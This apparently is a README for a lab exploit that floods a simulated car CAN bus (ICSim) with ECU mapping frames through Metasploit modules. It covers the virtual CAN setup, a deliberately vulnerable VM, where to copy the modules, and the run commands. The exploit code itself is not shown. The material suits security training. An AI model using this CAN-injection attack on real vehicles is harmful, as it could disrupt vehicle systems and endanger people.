Crazy-Tachymeter is an exploit that allows you to flood the CAN-Bus with frames of the ECU mapping file.
This project uses a CAN simulator (ICSim by OpenGarages). [Link]
- Virtual Machine with a CAN simulator installed. On this VM you also need a vulnerable server for remote command execution.
- Kali Linux with this exploit included.
- Make sure the machines are connected each other.
Download the vulnerable VM with CAN simulator installed from Release [Link]. (Bodhi-Linux, user=pass=tachymeter)
Open a terminal and run the following commands to setup a virtual CAN interface.
sudo modprobe can
sudo modprobe vcan
sudo ip link add dev vcan0 type vcan
sudo ip link set up vcan0
After that, open two terminal and enter on ICSim directory, then use the following commands for startup simulator and controller.
./icsim vcan0
./controls vcan0
At this point you need to start the vulnerable server for remote command execution.
cd Documents
Now your VM is ready and vulnerable for the exploit.
You can follow 2 ways:
On Kali Linux, copy the:
/exploit/remote/crazytachymeter_remote.rb --> to --> /usr/share/metasploit-framework/modules/auxiliary/spoof/replay/
OR (if you have already a metasploit session and you don't need a vulnerable server)
/exploit/crazytachymeter.rb --> to --> /usr/share/metasploit-framework/modules/post/hardware/automotive/
Then copy the
/exploit/controlUnitMapCanBus.txt --> to --> /usr/share/metasploit-framework/data/wordlists/controlUnitMapCanBus.txt
After that, based on the choice of the exploit in the previous step, you can run:
use auxiliary/spoof/replay/crazytachymeter_remote
set interface vcan0
set rhost IPVictim
set rport python_server_port_number
OR (if you have already a metasploit session and you don't need a vulnerable server) you can run:
use post/hardware/automotive/crazytachymeter
set INTERFACE canbusinterface (e.g. vcan0)
set session id
Now you can see the exploit running.. Look at the tachymeter. You can also change the path of the file with a new ECU mapping!